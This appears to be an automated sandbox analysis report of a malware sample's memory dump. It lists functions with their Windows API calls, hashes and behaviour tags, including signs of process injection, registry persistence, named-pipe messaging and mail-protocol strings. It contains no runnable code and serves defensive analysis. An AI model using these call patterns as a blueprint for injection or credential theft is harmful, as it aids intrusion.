  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB47B, Relevance: 16.7, APIs: 11, Instructions: 187 Total matches: 59synchronizationstring
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBB92, Relevance: 15.1, APIs: 10, Instructions: 109 Total matches: 83pipesynchronization
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF75B, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 172 Total matches: 23string
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
